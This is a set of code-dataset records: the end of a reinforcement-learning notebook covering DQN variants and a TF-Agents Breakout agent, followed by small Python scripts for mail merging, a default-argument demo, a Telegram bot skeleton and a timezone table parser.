24])\n\nsave_fig(\"q_value_plot\")\n\n\n# # Deep Q-Network\n\n# Let's build the DQN. Given a state, it will estimate, for each possible action, the sum of discounted future rewards it can expect after it plays that action (but before it sees its outcome):\n\n# In[55]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nenv = gym.make(\"CartPole-v1\")\ninput_shape = [4] # == env.observation_space.shape\nn_outputs = 2 # == env.action_space.n\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(32, activation=\"elu\", input_shape=input_shape),\n keras.layers.Dense(32, activation=\"elu\"),\n keras.layers.Dense(n_outputs)\n])\n\n\n# To select an action using this DQN, we just pick the action with the largest predicted Q-value. However, to ensure that the agent explores the environment, we choose a random action with probability `epsilon`.\n\n# In[56]:\n\n\ndef epsilon_greedy_policy(state, epsilon=0):\n if np.random.rand() < epsilon:\n return np.random.randint(2)\n else:\n Q_values = model.predict(state[np.newaxis])\n return np.argmax(Q_values[0])\n\n\n# We will also need a replay memory. It will contain the agent's experiences, in the form of tuples: `(obs, action, reward, next_obs, done)`. We can use the `deque` class for that:\n\n# In[57]:\n\n\nfrom collections import deque\n\nreplay_memory = deque(maxlen=2000)\n\n\n# And let's create a function to sample experiences from the replay memory. 
It will return 5 NumPy arrays: `[obs, actions, rewards, next_obs, dones]`.\n\n# In[58]:\n\n\ndef sample_experiences(batch_size):\n    indices = np.random.randint(len(replay_memory), size=batch_size)\n    batch = [replay_memory[index] for index in indices]\n    states, actions, rewards, next_states, dones = [\n        np.array([experience[field_index] for experience in batch])\n        for field_index in range(5)]\n    return states, actions, rewards, next_states, dones\n\n\n# Now we can create a function that will use the DQN to play one step, and record its experience in the replay memory:\n\n# In[59]:\n\n\ndef play_one_step(env, state, epsilon):\n    action = epsilon_greedy_policy(state, epsilon)\n    next_state, reward, done, info = env.step(action)\n    replay_memory.append((state, action, reward, next_state, done))\n    return next_state, reward, done, info\n\n\n# Lastly, let's create a function that will sample some experiences from the replay memory and perform a training step:\n\n# In[60]:\n\n\nbatch_size = 32\ndiscount_rate = 0.95\noptimizer = keras.optimizers.Adam(lr=1e-3)\nloss_fn = keras.losses.mean_squared_error\n\ndef training_step(batch_size):\n    experiences = sample_experiences(batch_size)\n    states, actions, rewards, next_states, dones = experiences\n    next_Q_values = model.predict(next_states)\n    max_next_Q_values = np.max(next_Q_values, axis=1)\n    target_Q_values = rewards + (1 - dones) * discount_rate * max_next_Q_values\n    mask = tf.one_hot(actions, n_outputs)\n    with tf.GradientTape() as tape:\n        all_Q_values = model(states)\n        Q_values = tf.reduce_sum(all_Q_values * mask, axis=1, keepdims=True)\n        loss = tf.reduce_mean(loss_fn(target_Q_values, Q_values))\n    grads = tape.gradient(loss, model.trainable_variables)\n    optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n\n# And now, let's train the model!\n\n# In[61]:\n\n\nenv.seed(42)\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nrewards = [] \nbest_score = 0\n\n\n# In[62]:\n\n\nfor episode in range(600):\n    obs = env.reset()    \n    for step in range(200):\n        epsilon = max(1 - episode / 500, 0.01)\n        obs, reward, done, info = play_one_step(env, obs, epsilon)\n        if done:\n            break\n    rewards.append(step) # Not shown in the book\n    if step > best_score: # Not shown\n        best_weights = model.get_weights() # Not shown\n        best_score = step # Not shown\n    print(\"\\rEpisode: {}, Steps: {}, eps: {:.3f}\".format(episode, step + 1, epsilon), end=\"\") # Not shown\n    if episode > 50:\n        training_step(batch_size)\n\nmodel.set_weights(best_weights)\n\n\n# In[63]:\n\n\nplt.figure(figsize=(8, 4))\nplt.plot(rewards)\nplt.xlabel(\"Episode\", fontsize=14)\nplt.ylabel(\"Sum of rewards\", fontsize=14)\nsave_fig(\"dqn_rewards_plot\")\nplt.show()\n\n\n# In[64]:\n\n\nenv.seed(42)\nstate = env.reset()\n\nframes = []\n\nfor step in range(200):\n    action = epsilon_greedy_policy(state)\n    state, reward, done, info = env.step(action)\n    if done:\n        break\n    img = env.render(mode=\"rgb_array\")\n    frames.append(img)\n    \nplot_animation(frames)\n\n\n# Not bad at all!\n\n# ## Double DQN\n\n# In[65]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential([\n    keras.layers.Dense(32, activation=\"elu\", input_shape=[4]),\n    keras.layers.Dense(32, activation=\"elu\"),\n    keras.layers.Dense(n_outputs)\n])\n\ntarget = keras.models.clone_model(model)\ntarget.set_weights(model.get_weights())\n\n\n# In[66]:\n\n\nbatch_size = 32\ndiscount_rate = 0.95\noptimizer = keras.optimizers.Adam(lr=1e-3)\nloss_fn = keras.losses.Huber()\n\n
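# Note added for clarity (not in the original notebook): in the Double DQN training step below, the *online* model selects the best next actions, while the *target* model evaluates those actions -- decoupling selection from evaluation is what reduces vanilla DQN's overestimation bias.\n\n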
def training_step(batch_size):\n    experiences = sample_experiences(batch_size)\n    states, actions, rewards, next_states, dones = experiences\n    next_Q_values = model.predict(next_states)\n    best_next_actions = np.argmax(next_Q_values, axis=1)\n    next_mask = tf.one_hot(best_next_actions, n_outputs).numpy()\n    next_best_Q_values = (target.predict(next_states) * next_mask).sum(axis=1)\n    target_Q_values = rewards + (1 - dones) * discount_rate * next_best_Q_values\n    mask = tf.one_hot(actions, n_outputs)\n    with tf.GradientTape() as tape:\n        all_Q_values = model(states)\n        Q_values = tf.reduce_sum(all_Q_values * mask, axis=1, keepdims=True)\n        loss = tf.reduce_mean(loss_fn(target_Q_values, Q_values))\n    grads = tape.gradient(loss, model.trainable_variables)\n    optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n\n# In[67]:\n\n\nreplay_memory = deque(maxlen=2000)\n\n\n# In[68]:\n\n\nenv.seed(42)\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nrewards = []\nbest_score = 0\n\nfor episode in range(600):\n    obs = env.reset()    \n    for step in range(200):\n        epsilon = max(1 - episode / 500, 0.01)\n        obs, reward, done, info = play_one_step(env, obs, epsilon)\n        if done:\n            break\n    rewards.append(step)\n    if step > best_score:\n        best_weights = model.get_weights()\n        best_score = step\n    print(\"\\rEpisode: {}, Steps: {}, eps: {:.3f}\".format(episode, step + 1, epsilon), end=\"\")\n    if episode > 50:\n        training_step(batch_size)\n        if episode % 50 == 0:\n            target.set_weights(model.get_weights())\n    # Alternatively, you can do soft updates at each step:\n    #if episode > 50:\n        #target_weights = target.get_weights()\n        #online_weights = model.get_weights()\n        #for index in range(len(target_weights)):\n        #    target_weights[index] = 0.99 * target_weights[index] + 0.01 * online_weights[index]\n        #target.set_weights(target_weights)\n\nmodel.set_weights(best_weights)\n\n\n# In[69]:\n\n\nplt.figure(figsize=(8, 4))\nplt.plot(rewards)\nplt.xlabel(\"Episode\", fontsize=14)\nplt.ylabel(\"Sum of rewards\", fontsize=14)\nsave_fig(\"double_dqn_rewards_plot\")\nplt.show()\n\n\n# In[70]:\n\n\nenv.seed(42)\nstate = env.reset()\n\nframes = []\n\nfor step in range(200):\n    action = epsilon_greedy_policy(state)\n    state, reward, done, info = env.step(action)\n    if done:\n        break\n    img = env.render(mode=\"rgb_array\")\n    frames.append(img)\n    \nplot_animation(frames)\n\n\n# # Dueling Double DQN\n\n# In[71]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nK = keras.backend\ninput_states = keras.layers.Input(shape=[4])\nhidden1 = keras.layers.Dense(32, activation=\"elu\")(input_states)\nhidden2 = keras.layers.Dense(32, activation=\"elu\")(hidden1)\nstate_values = keras.layers.Dense(1)(hidden2)\nraw_advantages = keras.layers.Dense(n_outputs)(hidden2)\nadvantages = raw_advantages - K.max(raw_advantages, axis=1, keepdims=True)\nQ_values = state_values + advantages\nmodel = keras.models.Model(inputs=[input_states], outputs=[Q_values])\n\ntarget = keras.models.clone_model(model)\ntarget.set_weights(model.get_weights())\n\n
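# Added note (not in the original notebook): the two heads above decompose Q(s, a) = V(s) + A(s, a), with the advantages shifted so that max_a A(s, a) = 0 -- this makes the decomposition identifiable, since V(s) alone then carries the state's value.\n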
\n# In[72]:\n\n\nbatch_size = 32\ndiscount_rate = 0.95\noptimizer = keras.optimizers.Adam(lr=1e-2)\nloss_fn = keras.losses.Huber()\n\ndef training_step(batch_size):\n    experiences = sample_experiences(batch_size)\n    states, actions, rewards, next_states, dones = experiences\n    next_Q_values = model.predict(next_states)\n    best_next_actions = np.argmax(next_Q_values, axis=1)\n    next_mask = tf.one_hot(best_next_actions, n_outputs).numpy()\n    next_best_Q_values = (target.predict(next_states) * next_mask).sum(axis=1)\n    target_Q_values = rewards + (1 - dones) * discount_rate * next_best_Q_values\n    mask = tf.one_hot(actions, n_outputs)\n    with tf.GradientTape() as tape:\n        all_Q_values = model(states)\n        Q_values = tf.reduce_sum(all_Q_values * mask, axis=1, keepdims=True)\n        loss = tf.reduce_mean(loss_fn(target_Q_values, Q_values))\n    grads = tape.gradient(loss, model.trainable_variables)\n    optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n\n# In[73]:\n\n\nreplay_memory = deque(maxlen=2000)\n\n\n# In[74]:\n\n\nenv.seed(42)\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nrewards = []\nbest_score = 0\n\nfor episode in range(600):\n    obs = env.reset()    \n    for step in range(200):\n        epsilon = max(1 - episode / 500, 0.01)\n        obs, reward, done, info = play_one_step(env, obs, epsilon)\n        if done:\n            break\n    rewards.append(step)\n    if step > best_score:\n        best_weights = model.get_weights()\n        best_score = step\n    print(\"\\rEpisode: {}, Steps: {}, eps: {:.3f}\".format(episode, step + 1, epsilon), end=\"\")\n    if episode > 50:\n        training_step(batch_size)\n        if episode % 200 == 0:\n            target.set_weights(model.get_weights())\n\nmodel.set_weights(best_weights)\n\n\n# In[75]:\n\n\nplt.plot(rewards)\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Sum of rewards\")\nplt.show()\n\n\n# In[76]:\n\n\nenv.seed(42)\nstate = env.reset()\n\nframes = []\n\nfor step in range(200):\n    action = epsilon_greedy_policy(state)\n    state, reward, done, info = env.step(action)\n    if done:\n        break\n    img = env.render(mode=\"rgb_array\")\n    frames.append(img)\n    \nplot_animation(frames)\n\n\n# This looks like a pretty robust agent!\n\n# In[77]:\n\n\nenv.close()\n\n\n# # Using TF-Agents to Beat Breakout\n\n# Let's use TF-Agents to create an agent that will learn to play Breakout. We will use the Deep Q-Learning algorithm, so you can easily compare the components with the previous implementation, but TF-Agents implements many other (and more sophisticated) algorithms!\n\n# ## TF-Agents Environments\n\n# In[78]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\n\n# In[79]:\n\n\nfrom tf_agents.environments import suite_gym\n\nenv = suite_gym.load(\"Breakout-v4\")\nenv\n\n\n# In[80]:\n\n\nenv.gym\n\n\n# In[81]:\n\n\nenv.seed(42)\nenv.reset()\n\n\n# In[82]:\n\n\nenv.step(1) # Fire\n\n\n# In[83]:\n\n\nimg = env.render(mode=\"rgb_array\")\n\nplt.figure(figsize=(6, 8))\nplt.imshow(img)\nplt.axis(\"off\")\nsave_fig(\"breakout_plot\")\nplt.show()\n\n\n# In[84]:\n\n\nenv.current_time_step()\n\n\n# ## Environment Specifications\n\n# In[85]:\n\n\nenv.observation_spec()\n\n\n# In[86]:\n\n\nenv.action_spec()\n\n\n# In[87]:\n\n\nenv.time_step_spec()\n\n\n# ## Environment Wrappers\n\n# You can wrap a TF-Agents environment in a TF-Agents wrapper:\n\n# In[88]:\n\n\nfrom tf_agents.environments.wrappers import ActionRepeat\n\nrepeating_env = ActionRepeat(env, times=4)\nrepeating_env\n\n\n# In[89]:\n\n\nrepeating_env.unwrapped\n\n\n# Here is the list of available wrappers:\n\n# In[90]:\n\n\nimport tf_agents.environments.wrappers\n\nfor name in dir(tf_agents.environments.wrappers):\n    obj = getattr(tf_agents.environments.wrappers, name)\n    if hasattr(obj, \"__base__\") and issubclass(obj, tf_agents.environments.wrappers.PyEnvironmentBaseWrapper):\n        print(\"{:27s} {}\".format(name, obj.__doc__.split(\"\\n\")[0]))\n\n\n# The `suite_gym.load()` function can create an env and wrap it for you, both with TF-Agents environment wrappers and Gym environment wrappers (the latter are applied first).\n
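\n# Added note: suite_gym.load() expects wrapper *callables* rather than wrapper instances, which is why functools.partial is used below to pre-bind the constructor arguments before each wrapper is applied to the environment.\n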
\n# In[91]:\n\n\nfrom functools import partial\nfrom gym.wrappers import TimeLimit\n\nlimited_repeating_env = suite_gym.load(\n    \"Breakout-v4\",\n    gym_env_wrappers=[partial(TimeLimit, max_episode_steps=10000)],\n    env_wrappers=[partial(ActionRepeat, times=4)],\n)\n\n\n# In[92]:\n\n\nlimited_repeating_env\n\n\n# In[93]:\n\n\nlimited_repeating_env.unwrapped\n\n\n# Create an Atari Breakout environment, and wrap it to apply the default Atari preprocessing steps:\n\n# In[94]:\n\n\nfrom tf_agents.environments import suite_atari\nfrom tf_agents.environments.atari_preprocessing import AtariPreprocessing\nfrom tf_agents.environments.atari_wrappers import FrameStack4\n\nmax_episode_steps = 27000 # <=> 108k ALE frames since 1 step = 4 frames\nenvironment_name = \"BreakoutNoFrameskip-v4\"\n\nenv = suite_atari.load(\n    environment_name,\n    max_episode_steps=max_episode_steps,\n    gym_env_wrappers=[AtariPreprocessing, FrameStack4])\n\n\n# In[95]:\n\n\nenv\n\n\n# Play a few steps just to see what happens:\n\n# In[96]:\n\n\nenv.seed(42)\nenv.reset()\ntime_step = env.step(1) # FIRE\nfor _ in range(4):\n    time_step = env.step(3) # LEFT\n\n\n# In[97]:\n\n\ndef plot_observation(obs):\n    # Since there are only 3 color channels, you cannot display 4 frames\n    # with one primary color per frame. So this code computes the delta between\n    # the current frame and the mean of the other frames, and it adds this delta\n    # to the red and blue channels to get a pink color for the current frame.\n    obs = obs.astype(np.float32)\n    img = obs[..., :3]\n    current_frame_delta = np.maximum(obs[..., 3] - obs[..., :3].mean(axis=-1), 0.)\n    img[..., 0] += current_frame_delta\n    img[..., 2] += current_frame_delta\n    img = np.clip(img / 150, 0, 1)\n    plt.imshow(img)\n    plt.axis(\"off\")\n\n\n# In[98]:\n\n\nplt.figure(figsize=(6, 6))\nplot_observation(time_step.observation)\nsave_fig(\"preprocessed_breakout_plot\")\nplt.show()\n\n\n# Convert the Python environment to a TF environment:\n\n# In[99]:\n\n\nfrom tf_agents.environments.tf_py_environment import TFPyEnvironment\n\ntf_env = TFPyEnvironment(env)\n\n\n# ## Creating the DQN\n\n# Create a small preprocessing layer to normalize the observations. 
Images are stored using bytes from 0 to 255 to use less RAM, but we want to pass floats from 0.0 to 1.0 to the neural network:\n\n# Create the Q-Network:\n\n# In[100]:\n\n\nfrom tf_agents.networks.q_network import QNetwork\n\npreprocessing_layer = keras.layers.Lambda(\n lambda obs: tf.cast(obs, np.float32) / 255.)\nconv_layer_params=[(32, (8, 8), 4), (64, (4, 4), 2), (64, (3, 3), 1)]\nfc_layer_params=[512]\n\nq_net = QNetwork(\n tf_env.observation_spec(),\n tf_env.action_spec(),\n preprocessing_layers=preprocessing_layer,\n conv_layer_params=conv_layer_params,\n fc_layer_params=fc_layer_params)\n\n\n# Create the DQN Agent:\n\n# In[101]:\n\n\nfrom tf_agents.agents.dqn.dqn_agent import DqnAgent\n\n# see TF-agents issue #113\n#optimizer = keras.optimizers.RMSprop(lr=2.5e-4, rho=0.95, momentum=0.0,\n# epsilon=0.00001, centered=True)\n\ntrain_step = tf.Variable(0)\nupdate_period = 4 # run a training step every 4 collect steps\noptimizer = tf.compat.v1.train.RMSPropOptimizer(learning_rate=2.5e-4, decay=0.95, momentum=0.0,\n epsilon=0.00001, centered=True)\nepsilon_fn = keras.optimizers.schedules.PolynomialDecay(\n initial_learning_rate=1.0, # initial ε\n decay_steps=250000 // update_period, # <=> 1,000,000 ALE frames\n end_learning_rate=0.01) # final ε\nagent = DqnAgent(tf_env.time_step_spec(),\n tf_env.action_spec(),\n q_network=q_net,\n optimizer=optimizer,\n target_update_period=2000, # <=> 32,000 ALE frames\n td_errors_loss_fn=keras.losses.Huber(reduction=\"none\"),\n gamma=0.99, # discount factor\n train_step_counter=train_step,\n epsilon_greedy=lambda: epsilon_fn(train_step))\nagent.initialize()\n\n\n# Create the replay buffer:\n\n# In[102]:\n\n\nfrom tf_agents.replay_buffers import tf_uniform_replay_buffer\n\nreplay_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(\n data_spec=agent.collect_data_spec,\n batch_size=tf_env.batch_size,\n max_length=1000000)\n\nreplay_buffer_observer = replay_buffer.add_batch\n\n\n# Create a simple custom observer that counts and displays the number of times it is called (except when it is passed a trajectory that represents the boundary between two episodes, as this does not count as a step):\n\n# In[103]:\n\n\nclass ShowProgress:\n def __init__(self, total):\n self.counter = 0\n self.total = total\n def __call__(self, trajectory):\n if not trajectory.is_boundary():\n self.counter += 1\n if self.counter % 100 == 0:\n print(\"\\r{}/{}\".format(self.counter, self.total), end=\"\")\n\n\n# Let's add some training metrics:\n\n# In[104]:\n\n\nfrom tf_agents.metrics import tf_metrics\n\ntrain_metrics = [\n tf_metrics.NumberOfEpisodes(),\n tf_metrics.EnvironmentSteps(),\n tf_metrics.AverageReturnMetric(),\n tf_metrics.AverageEpisodeLengthMetric(),\n]\n\n\n# In[105]:\n\n\ntrain_metrics[0].result()\n\n\n# In[106]:\n\n\nfrom tf_agents.eval.metric_utils import log_metrics\nimport logging\nlogging.getLogger().setLevel(logging.INFO)\nlog_metrics(train_metrics)\n\n\n# Create the collect driver:\n\n# In[107]:\n\n\nfrom tf_agents.drivers.dynamic_step_driver import DynamicStepDriver\n\ncollect_driver = DynamicStepDriver(\n tf_env,\n agent.collect_policy,\n observers=[replay_buffer_observer] + train_metrics,\n num_steps=update_period) # collect 4 steps for each training iteration\n\n\n# Collect the initial experiences, before training:\n\n# In[108]:\n\n\nfrom tf_agents.policies.random_tf_policy import RandomTFPolicy\n\ninitial_collect_policy = RandomTFPolicy(tf_env.time_step_spec(),\n tf_env.action_spec())\ninit_driver = DynamicStepDriver(\n tf_env,\n 
initial_collect_policy,\n observers=[replay_buffer.add_batch, ShowProgress(20000)],\n num_steps=20000) # <=> 80,000 ALE frames\nfinal_time_step, final_policy_state = init_driver.run()\n\n\n# Let's sample 2 sub-episodes, with 3 time steps each and display them:\n\n# In[109]:\n\n\ntf.random.set_seed(888) # chosen to show an example of trajectory at the end of an episode\n\ntrajectories, buffer_info = replay_buffer.get_next(\n sample_batch_size=2, num_steps=3)\n\n\n# In[110]:\n\n\ntrajectories._fields\n\n\n# In[111]:\n\n\ntrajectories.observation.shape\n\n\n# In[112]:\n\n\nfrom tf_agents.trajectories.trajectory import to_transition\n\ntime_steps, action_steps, next_time_steps = to_transition(trajectories)\ntime_steps.observation.shape\n\n\n# In[113]:\n\n\ntrajectories.step_type.numpy()\n\n\n# In[114]:\n\n\nplt.figure(figsize=(10, 6.8))\nfor row in range(2):\n for col in range(3):\n plt.subplot(2, 3, row * 3 + col + 1)\n plot_observation(trajectories.observation[row, col].numpy())\nplt.subplots_adjust(left=0, right=1, bottom=0, top=1, hspace=0, wspace=0.02)\nsave_fig(\"sub_episodes_plot\")\nplt.show()\n\n\n# Now let's create the dataset:\n\n# In[115]:\n\n\ndataset = replay_buffer.as_dataset(\n sample_batch_size=64,\n num_steps=2,\n num_parallel_calls=3).prefetch(3)\n\n\n# Convert the main functions to TF Functions for better performance:\n\n# In[116]:\n\n\nfrom tf_agents.utils.common import function\n\ncollect_driver.run = function(collect_driver.run)\nagent.train = function(agent.train)\n\n\n# And now we are ready to run the main loop!\n\n# In[117]:\n\n\ndef train_agent(n_iterations):\n time_step = None\n policy_state = agent.collect_policy.get_initial_state(tf_env.batch_size)\n iterator = iter(dataset)\n for iteration in range(n_iterations):\n time_step, policy_state = collect_driver.run(time_step, policy_state)\n trajectories, buffer_info = next(iterator)\n train_loss = agent.train(trajectories)\n print(\"\\r{} loss:{:.5f}\".format(\n iteration, train_loss.loss.numpy()), end=\"\")\n if iteration % 1000 == 0:\n log_metrics(train_metrics)\n\n\n# Run the next cell to train the agent for 10,000 steps. Then look at its behavior by running the following cell. You can run these two cells as many times as you wish. 
The agent will keep improving!\n\n# In[118]:\n\n\ntrain_agent(n_iterations=10000)\n\n\n# In[119]:\n\n\nframes = []\ndef save_frames(trajectory):\n    global frames\n    frames.append(tf_env.pyenv.envs[0].render(mode=\"rgb_array\"))\n\nprev_lives = tf_env.pyenv.envs[0].ale.lives()\ndef reset_and_fire_on_life_lost(trajectory):\n    global prev_lives\n    lives = tf_env.pyenv.envs[0].ale.lives()\n    if prev_lives != lives:\n        tf_env.reset()\n        tf_env.pyenv.envs[0].step(1)\n        prev_lives = lives\n\nwatch_driver = DynamicStepDriver(\n    tf_env,\n    agent.policy,\n    observers=[save_frames, reset_and_fire_on_life_lost, ShowProgress(1000)],\n    num_steps=1000)\nfinal_time_step, final_policy_state = watch_driver.run()\n\nplot_animation(frames)\n\n\n# If you want to save an animated GIF to show off your agent to your friends, here's one way to do it:\n\n# In[120]:\n\n\nimport PIL\n\nimage_path = os.path.join(\"images\", \"rl\", \"breakout.gif\")\nframe_images = [PIL.Image.fromarray(frame) for frame in frames[:150]]\nframe_images[0].save(image_path, format='GIF',\n                     append_images=frame_images[1:],\n                     save_all=True,\n                     duration=30,\n                     loop=0)\n\n\n# In[121]:\n\n\nget_ipython().run_cell_magic('html', '', '')\n\n\n# # Extra material\n\n# ## Deque vs rotating list\n\n# The `deque` class offers fast append, but fairly slow random access (for large replay memories):\n\n# In[122]:\n\n\nfrom collections import deque\nnp.random.seed(42)\n\nmem = deque(maxlen=1000000)\nfor i in range(1000000):\n    mem.append(i)\n[mem[i] for i in np.random.randint(1000000, size=5)]\n\n\n# In[123]:\n\n\nget_ipython().run_line_magic('timeit', 'mem.append(1)')\n\n\n# In[124]:\n\n\nget_ipython().run_line_magic('timeit', '[mem[i] for i in np.random.randint(1000000, size=5)]')\n\n\n# Alternatively, you could use a rotating list like this `ReplayMemory` class. This would make random access faster for large replay memories:\n\n# In[125]:\n\n\nclass ReplayMemory:\n    def __init__(self, max_size):\n        self.buffer = np.empty(max_size, dtype=object)  # note: np.object was removed in NumPy 1.24; plain object is equivalent\n        self.max_size = max_size\n        self.index = 0\n        self.size = 0\n\n    def append(self, obj):\n        self.buffer[self.index] = obj\n        self.size = min(self.size + 1, self.max_size)\n        self.index = (self.index + 1) % self.max_size\n\n    def sample(self, batch_size):\n        indices = np.random.randint(self.size, size=batch_size)\n        return self.buffer[indices]\n\n\n# In[126]:\n\n\nmem = ReplayMemory(max_size=1000000)\nfor i in range(1000000):\n    mem.append(i)\nmem.sample(5)\n\n\n# In[127]:\n\n\nget_ipython().run_line_magic('timeit', 'mem.append(1)')\n\n\n# In[128]:\n\n\nget_ipython().run_line_magic('timeit', 'mem.sample(5)')\n\n\n# ## Creating a Custom TF-Agents Environment\n\n# To create a custom TF-Agent environment, you just need to write a class that inherits from the `PyEnvironment` class and implements a few methods. For example, the following minimal environment represents a simple 4x4 grid. The agent starts in one corner (0,0) and must move to the opposite corner (3,3). The episode is done if the agent reaches the goal (it gets a +10 reward) or if the agent goes out of bounds (-1 reward). 
The actions are up (0), down (1), left (2) and right (3).\n\n# In[129]:\n\n\nclass MyEnvironment(tf_agents.environments.py_environment.PyEnvironment):\n    def __init__(self, discount=1.0):\n        super().__init__()\n        self._action_spec = tf_agents.specs.BoundedArraySpec(\n            shape=(), dtype=np.int32, name=\"action\", minimum=0, maximum=3)\n        self._observation_spec = tf_agents.specs.BoundedArraySpec(\n            shape=(4, 4), dtype=np.int32, name=\"observation\", minimum=0, maximum=1)\n        self.discount = discount\n\n    def action_spec(self):\n        return self._action_spec\n\n    def observation_spec(self):\n        return self._observation_spec\n\n    def _reset(self):\n        self._state = np.zeros(2, dtype=np.int32)\n        obs = np.zeros((4, 4), dtype=np.int32)\n        obs[self._state[0], self._state[1]] = 1\n        return tf_agents.trajectories.time_step.restart(obs)\n\n    def _step(self, action):\n        self._state += [(-1, 0), (+1, 0), (0, -1), (0, +1)][action]\n        reward = 0\n        obs = np.zeros((4, 4), dtype=np.int32)\n        done = (self._state.min() < 0 or self._state.max() > 3)\n        if not done:\n            obs[self._state[0], self._state[1]] = 1\n        if done or np.all(self._state == np.array([3, 3])):\n            reward = -1 if done else +10\n            return tf_agents.trajectories.time_step.termination(obs, reward)\n        else:\n            return tf_agents.trajectories.time_step.transition(obs, reward,\n                                                               self.discount)\n\n\n# The action and observation specs will generally be instances of the `ArraySpec` or `BoundedArraySpec` classes from the `tf_agents.specs` package (check out the other specs in this package as well). Optionally, you can also define a `render()` method, a `close()` method to free resources, as well as a `time_step_spec()` method if you don't want the `reward` and `discount` to be 32-bit float scalars. Note that the base class takes care of keeping track of the current time step, which is why we must implement `_reset()` and `_step()` rather than `reset()` and `step()`.\n# \n\n# In[130]:\n\n\nmy_env = MyEnvironment()\ntime_step = my_env.reset()\ntime_step\n\n\n# In[131]:\n\n\ntime_step = my_env.step(1)\ntime_step\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"wilsonify/tensorflow-examples","sub_path":"src/tensorflow-examples/tensorflow_examples/converted_notebooks/18_reinforcement_learning.py","file_name":"18_reinforcement_learning.py","file_ext":"py","file_size_in_byte":51651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}
{"seq_id":"23213032864","text":"PLACEHOLDER = \"[Name]\"\n# with open(\"data.txt\") as f_data:\n#     f_data.readline()\n\n\nwith open(\"name.txt\") as rd:\n    name_list = rd.readlines()\n\nwith open(\"data.txt\") as rd_data:\n    Letter_content = rd_data.read()\n    for name in name_list:\n        n_name = name.strip()\n        new_letter = Letter_content.replace(PLACEHOLDER, n_name)\n        with open(f\"./data/{n_name}.txt\", mode=\"w\") as new_name:\n            new_name.write(new_letter)","repo_name":"farrukh-hamayoun/Mail_Merger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"36724184722","text":"def add(a, b=0):\n    '''\n    Add two numbers, a and b.\n    '''\n    print(a,b)\n    return a+b\n\n\nadd(2, 1)\nadd(1)\n\n#def foo(val, lst=[]):\n#    lst.append(val)\n#    return lst\n\n# Rewritten to avoid sharing the default list between calls:\ndef foo(val, lst=None):\n    if lst is None:\n        lst = []\n    lst.append(val)\n    return lst\n    \nlist1 = foo(10)\nprint(list1)\nlist2 = foo(123, [])\nprint(list2)\n
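\n# Added note (not in the original file): the commented-out version above is the\n# classic mutable-default-argument pitfall -- the default list is created once,\n# at function definition time, and is shared between calls:\n#     >>> def bad(val, lst=[]):\n#     ...     lst.append(val)\n#     ...     return lst\n#     >>> bad(1)\n#     [1]\n#     >>> bad(2)\n#     [1, 2]    # same list as before!\n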
\nlist3 = foo('a')\nprint(list3)\n\n","repo_name":"wzgdavid/python_kecheng","sub_path":"samples/history/BDA2/day3/huigu.py","file_name":"huigu.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"}
{"seq_id":"37038147980","text":"from aiogram import Bot, Dispatcher\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.utils import executor\n\nfrom architecture.achitecture import StateArchitecture\nfrom config import TOKEN\nfrom db import DataBase\nfrom services.analyzer import Analyzer\n\n\nclass TelegramBot:\n    token = TOKEN\n    connection = DataBase()\n    \n    def __init__(self):\n        self.bot = Bot(token=self.token)\n        self.dispatcher = Dispatcher(self.bot, storage=MemoryStorage())\n        self.analyzer = Analyzer()\n        self.architecture = StateArchitecture(self.bot, self.connection, self.dispatcher, self.analyzer)\n\n    async def on_startup(self, dispatcher):\n        self.connection.connect()\n\n        # Of course, the tables should not be created every time the bot starts.\n        # This needs to be moved somewhere separate\n        self.connection.create_tables()\n        print('Bot started, database connection established')\n    \n    async def on_shutdown(self, dispatcher):\n        self.connection.close()\n        print('Bot stopped, database connection closed')\n    \n    def start(self) -> None:\n        self.architecture.build()\n    \n        executor.start_polling(\n            self.dispatcher,\n            skip_updates=True,\n            on_startup=self.on_startup,\n            on_shutdown=self.on_shutdown,\n        )\n        # skip_updates - the bot will not reply to messages that were sent while it was offline\n","repo_name":"pten4uk99/admission-bot","sub_path":"bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"4197616669","text":"import csv\n\nfrom requests import get\nfrom bs4 import BeautifulSoup\n\n\ndef parse():\n    timezones = []\n    with open('timezones.html') as f:\n        html = f.read()\n    soup = BeautifulSoup(html, 'html.parser')\n    for i in soup.find_all('tr'):\n        time_list = []\n        for q in i.find_all('td'):\n            time_list.append(q.get_text())\n        timezones.append(time_list)\n    with open('times.csv', 'w', encoding='utf8') as f:\n        writer = csv.writer(f, delimiter=';')\n        for i in timezones:\n            writer.writerow([q.strip() for q in i])\n\n\ninf = {}\nwith open('times.csv', 'r', encoding='utf8') as f:\n    reader = csv.reader(f, delimiter=';')\n    for i in reader:\n        if i:\n            # bug fix: the original one-liner's precedence made every negative\n            # zone evaluate to the constant -1; repair the mojibake minus sign\n            # first, then apply the sign to the parsed offset\n            offset = i[5].replace('в€’', '-')\n            sign = 1 if offset[0] == '+' else -1\n            inf[i[2]] = sign * int(offset[1:3])\nprint(inf)\nprint(inf['Europe/Moscow'])\n","repo_name":"belozerov-yaroslav/schedule_skill","sub_path":"timezone parser.py","file_name":"timezone parser.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
